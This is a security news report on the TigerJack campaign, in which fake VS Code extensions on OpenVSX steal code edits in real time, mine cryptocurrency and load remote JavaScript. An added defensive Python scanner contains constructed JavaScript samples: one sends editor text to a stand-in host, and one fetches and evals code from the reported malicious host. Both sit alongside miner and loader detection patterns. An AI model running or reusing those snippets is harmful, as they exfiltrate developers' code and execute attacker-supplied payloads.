TigerJack Hackers Use Malicious VSCode Extensions for Real-Time Code Theft and Cryptojacking on OpenVSX
Several extensions for Visual Studio Code, distributed via the open OpenVSX repository, have been found to contain malicious code aimed at cryptocurrency theft and the compromise of developers’ machines. The campaign is attributed to a group known as TigerJack, which fabricates accounts and disguises its tools as legitimate plugins—complete with polished descriptions, GitHub repositories, and professional branding.
Two malicious extensions remain accessible on OpenVSX despite having been removed from Microsoft’s official marketplace after accumulating more than 17,000 downloads in total. The same plugins have subsequently reappeared in Visual Studio Code under new names, indicating a systematic, persistent attack. The malicious toolkit targets users of VS Code–compatible editors that do not rely on Microsoft’s store—platforms such as Cursor and Windsurf, for example.
Koi Security’s researchers discovered that the “C++ Playground” extension begins monitoring source edits immediately after installation, logging every change to C++ files via the onDidChangeTextDocument handler. At roughly half-second intervals it transmits the updated text to external servers, enabling attackers to exfiltrate code in real time.
Another plugin, “HTTP Format,” appears to function normally on the surface but clandestinely launches a CoinIMP mining payload. The miner uses hard-coded settings and credentials and imposes no resource limits—driving the CPU to full load to mine cryptocurrency illicitly.
A further class of malicious plugins—including cppplayground, httpformat, and pythonformat—periodically (every 20 minutes) fetches and executes JavaScript from a remote address (ab498.pythonanywhere.com/static/in4.js). This mechanism lets the attackers push arbitrary payloads dynamically without updating the extension itself.
That capability makes the threat particularly severe: beyond stealing keys and credentials, an attacker can deploy ransomware, plant backdoors inside projects, or use an infected developer workstation as a foothold into an organization’s internal network.
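A defender-side triage script for the two behaviours described above (the per-edit exfiltration via onDidChangeTextDocument and the periodic remote-code loader), added here as an illustration; it is not part of the original report or of Koi Security's tooling. The JavaScript samples, the `example.invalid` host and the rule patterns are constructed for the demonstration; only the pythonanywhere host comes from the report.

```python
"""Static triage of VS Code extension JavaScript for the behaviours described above:
live document exfiltration (onDidChangeTextDocument + outbound request),
periodic remote code loading (setInterval + fetch + eval), and embedded miners."""
import re
from pathlib import Path

# Each rule lists regexes that must ALL appear in one file (co-occurrence, not single hits,
# because onDidChangeTextDocument alone is used by every legitimate linter).
RULES = {
    "live-document-exfil": [r"onDidChangeTextDocument",
                            r"\b(https?\.request|fetch|axios)\s*\("],
    "remote-code-loader": [r"\bsetInterval\s*\(",
                           r"\b(https?\.request|fetch|axios)\s*\(",
                           r"\b(eval|new\s+Function)\s*\("],
    "embedded-miner": [r"CoinIMP|coinimp|cryptonight|stratum\+tcp"],
}
KNOWN_HOSTS = ["ab498.pythonanywhere.com"]  # host named in the report; add your own IoCs

def scan_source(src):
    """Return rule names whose every pattern matches src, plus any known host seen."""
    hits = [name for name, pats in RULES.items() if all(re.search(p, src) for p in pats)]
    return hits + [f"known-host:{h}" for h in KNOWN_HOSTS if h in src]

def scan_extension_dir(root):
    """Scan every .js file under an extensions folder (e.g. ~/.vscode/extensions)."""
    findings = {}
    for js in Path(root).rglob("*.js"):
        if "node_modules" in js.parts:
            continue  # vendored dependencies are noisy; triage them separately
        hits = scan_source(js.read_text(errors="ignore"))
        if hits:
            findings[str(js)] = hits
    return findings

# Constructed samples imitating the reported behaviours; not the real extension code.
SAMPLE_EXFIL = """
const vscode = require('vscode'); const https = require('https'); let buf = '';
vscode.workspace.onDidChangeTextDocument(e => { buf = e.document.getText(); });
setInterval(() => https.request({host: 'example.invalid', method: 'POST'}).end(buf), 500);
"""
SAMPLE_LOADER = """
setInterval(() => fetch('https://ab498.pythonanywhere.com/static/in4.js')
  .then(r => r.text()).then(code => eval(code)), 20 * 60 * 1000);
"""
SAMPLE_BENIGN = "vscode.workspace.onDidChangeTextDocument(e => lint(e.document));"

if __name__ == "__main__":
    for label, src in [("exfil", SAMPLE_EXFIL), ("loader", SAMPLE_LOADER), ("benign", SAMPLE_BENIGN)]:
        print(label, scan_source(src))
```

Run `scan_extension_dir` against the editor's extensions folder (Cursor and Windsurf keep their own) and review any flagged file by hand; co-occurrence rules cut the noise from ordinary linters but are a triage aid, not a verdict.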
Koi Security assesses that TigerJack’s activity is a coordinated operation run through multiple accounts. Each malicious extension is published under a different author persona that purports to be a reputable developer; the profiles include public source code, detailed feature descriptions, and names that closely mimic genuine, popular tools.
The findings have been reported to OpenVSX administrators, but at the time of publication no response had been received and the malicious plugins remained publicly available.